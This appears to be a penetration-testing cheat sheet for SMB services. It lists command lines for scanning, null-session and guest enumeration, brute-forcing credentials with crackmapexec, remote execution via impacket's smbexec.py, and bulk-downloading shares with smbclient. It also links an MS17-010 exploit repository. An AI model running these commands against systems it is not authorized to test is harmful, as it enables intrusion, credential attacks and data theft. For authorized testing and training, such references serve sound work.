Skip to content

139,445 - Pentesting smb

SMB stands for Server Message Block, a network protocol used for file and printer sharing among other things in a Microsoft Windows environment. SMB was first introduced in the 1980s and has evolved over time, with newer versions offering increased functionality and security.

SMB allows client computers to access resources (such as files and printers) on a server as if they were part of the same network, regardless of their physical location. SMB supports many operations, including reading and writing files, requesting print jobs, and managing shared resources such as directories and printers.

nmap


sudo nmap -p 139,445 -A $IP
sudo nmap -p 139,445 -sC -sV -Pn -vv $IP

nmap script

# ls /usr/share/nmap/scripts/*smb*
sudo nmap -p 139,445 --script=smb-vuln-* $IP
sudo nmap -p 139,445 --script=smb-enum-users.nse $IP
sudo nmap -p 139,445 --script=smb-enum-shares.nse $IP

rpcclient


rpcclient -U "" -N $IP
# check wireshark if you want to see smb version like Samba 2.2.7a

nbtscan


sudo nbtscan -r $IP/24

enum4linux


enum4linux -a $IP
enum4linux -a -u 'guest' $IP
enum4linux -a -u 'guest' $URL
enum4linux2 $IP

crackmapexec


crackmapexec - bruteforce

crackmapexec smb $IP -u user.txt -p user.txt --shares --continue-on-success

crackmapexec - enumeration with guest user (no password)

crackmapexec smb $IP -u '' -p '' --shares
crackmapexec smb $IP -u 'guest' -p '' --shares

crackmapexec smb $IP -u 'guest' -p '' --users
crackmapexec smb $IP -u 'guest' -p '' --groups
crackmapexec smb $IP -u 'guest' -p '' --local-groups
crackmapexec smb $IP -u 'guest' -p '' --loggedon-users
crackmapexec smb $IP -u 'guest' -p '' --rid-brute
crackmapexec smb $IP -u 'guest' -p '' --sessions
crackmapexec smb $IP -u 'guest' -p '' --pass-pol

smbexec.py


target: windows

/opt/tools/impacket/examples/smbexec.py $USER:$PASS@$IP

smbmap


smbmap -H $IP -u anonymous 
smbmap -H $IP -d $DOMAIN -u $USER -p $PASS

smbclient


smbclient //$IP/tmp -U ''
smbclient //$IP/msfadmin -U 'msfadmin' 
smbclient "//$IP/Enterprise-Share" --user=$USER --password=$PASS
smbclient "\\\\$IP\Enterprise-Share" --user=$USER --password=$PASS

smbclient '\\11.22.33.44\shares' --user='admin' --password='123456'
smbclient '\\11.22.33.44\shares' --no-pass
smbclient '\\11.22.33.44\shares' -U 'guest' -N
smbclient '\\11.22.33.44\shares' -U 'guest'
smbclient '\\11.22.33.44\shares\'

smbclient - get folder

smbclient '\\11.22.33.44\[share]' -U 'guest' -N -c 'prompt OFF;recurse ON;  mget *'
smbclient '\\11.22.33.44\[share]' -U 'guest' -c 'prompt OFF;recurse ON;  mget *'
smbclient '\\11.22.33.44\[share]' -N -c 'prompt OFF;recurse ON;cd "Share\"; lcd "/home/kali/workspace/gatekeeper/smb_dump/Share/"; mget *'
smbclient '\\11.22.33.44\[share]' -N -c 'prompt OFF;recurse ON;cd "Profile\"; lcd "/home/kali/workspace/gatekeeper/smb_dump/Default/"; mget *'

smbget


smbget -R 'smb://11.22.33.44/anonymous/'
smbget -R 'smb://11.22.33.44/Users/desktop.ini'

exploits


  • https://github.com/3ndG4me/AutoBlue-MS17-010